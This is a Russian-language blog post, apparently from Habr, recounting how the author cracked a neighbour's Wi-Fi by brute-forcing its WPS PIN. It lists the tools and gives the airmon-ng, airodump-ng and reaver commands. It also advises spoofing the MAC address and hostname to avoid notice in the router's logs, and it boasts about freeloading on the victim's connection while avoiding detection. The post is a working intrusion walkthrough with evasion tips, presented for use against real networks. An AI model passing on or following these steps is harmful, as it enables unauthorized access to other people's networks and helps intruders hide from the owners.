Pull to refresh

Личный опыт по «взлому» Wi-Fi

imageНа страницах Харбрахабра был пост про взлом Wi-FI за 10 часов. Я лишь поведаю о своем личном опыте взлома сети со сложным паролем.

Как-то наткнулся в интернете на информацию об уязвимости, присутствующей почти во всех маршрутизаторах.
Это функция, призванная нам помогать — W(Wi-Fi)P(rotected)S(etup).
И вот, у меня зачесались руки и притом жажда «халявы» у русских в крови спортивный интерес был очень велик.

Что мне понадобилось:image
1)Любой дистрибутив Linux (Можно Backtrack)
2)Соответствующие программы: Aircrack (для мониторинга сетей) и Reaver (для подбора WPS PIN)
3)Хорошая антенна приема Wi-Fi (для увеличения числа «жертв», но мне хватило встроенной в ноутбук)
4)Wi-Fi адаптер с поддержкой мониторинга сети.

Отдельное замечание про установку aircrack и reaver. Я не нашел в репозиториях этих пакетах. Пришлось компилировать, но в связи с тем, что на просторах интернета много информации по установке данных программ, я не стал писать об этом.

В моей квартире переплетаются пара сетей Wi-Fi. Но сигнал был наилучшим только у одной.
Но прежде не будет лишним сменить MAC-адрес карточки и имя компьютера с «Компьютер Дяди Жени с 35 квартиры» на «Administrator» или что-нибудь не привлекающее внимание (в настройках роутера можно посмотреть всех подключенных когда-либо пользователей).

Меняем в linux Ubuntu (если не Backtrack — если BackTrack пропустите этот пункт)

В /etc/hosts пропишите <имя нового компа> рядом с localhost
Терминал:
sudo hostname < новое имя компа >.

MAC адрес — sudo ifconfig < имя интерфейса > hw ether xx:xx:xx:xx — все это временно до перезагрузки.
Замечу, что в KDE в настройках Wi-Fi адаптера есть возможность выбора случайного MAC адреса.

sudo su
airmon-ng start wlan0
airodump-ng mon0
reaver -i mon0 -b < mac адрес сети > -a -vv

После подбора PIN WPS вы получите сам пароль.

Теперь я сижу бесплатно так сказать в интернете со смартфона. У меня хороший сигнал на кухне и в туалете. А большего и мне не надо. Сейчас в мыслях либо усилить сигнал соседа через свой маршрутизатор (в роли ретранслятора) или создать свою локальную Wi-Fi сеть.

P.S Подключался к сети с 2 Мб/С, но побоялся скачивать много. Так как трафик скорее всего оплачиваемый по тарифу и я мог попасться. Еще не хотелось людей подставлять.
Я знаю точно, что «Ростелеком» введет лог посещенных сайтов. Если взломанная жертва подаст заявление, а вы сидели в соц. сетях, то можно выйти на вас.
Tags:
Hubs:
You can’t comment this publication because its author is not yet a full member of the community. You will be able to contact the author only after he or she has been invited by someone in the community. Until then, author’s username will be hidden by an alias.